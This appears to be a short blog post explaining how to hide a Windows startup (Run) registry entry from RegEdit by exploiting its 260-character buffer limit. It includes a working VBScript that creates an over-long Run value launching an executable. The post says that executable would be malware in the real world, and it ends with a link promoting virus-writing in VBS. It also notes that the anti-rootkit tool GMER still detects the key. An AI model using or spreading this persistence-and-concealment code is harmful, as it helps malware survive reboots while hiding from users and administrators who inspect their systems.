Hide Registry Key

The Hiding of Registry Key in this Article is done by exploiting a vulerability in REGEDIT. The function is exploited by creating a key with the string value whose length will be greater than 260 bytes.
This vulnerability is useful only for RegEdit and RegEdit32 and not other softwares like Ccleaner and regutil as they use buffer length greater than 260 which makes the Registry visible to them. While RegEdit uses Buffer length equal to 260 only, we create a key with string length with 261 or greater and hopefully get it invisible. This is a co-incidental design flaw rather than a bug. This trick should make our Key invisible and at the same time, run the Dummy file (which in the real world would be the malware) faithfully during the startup. This Vulnerability is reportedly being exploited by a malware in the wild.

So, below is the V(isual) B(asic) S(cript) Code that should do the trick:

Const Alphabets = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
Dim Shell, my_lengthy_string, i
Set Shell = CreateObject("WScript.Shell")
my_lengthy_string = Alphabets
For i = 0 to 10
                my_lengthy_string = my_lengthy_string & Alphabets
Next
Shell.RegWrite "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run\" _
                & my_lengthy_string, "C:\DUMMY.EXE", "REG_SZ"
Set Shell = Nothing
And you can clearly see the consequence in the Snapshot above. The Registry Key in Red Highlight is produced by the VBS Code posted above. The Hidden Registry Key was caught by Anti-Rootkit Tool called GMER. While the same Registry Key is nowhere to be found in the RegEdit.

Learn how you can make a Virus in VBS

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

No comments:

Post a Comment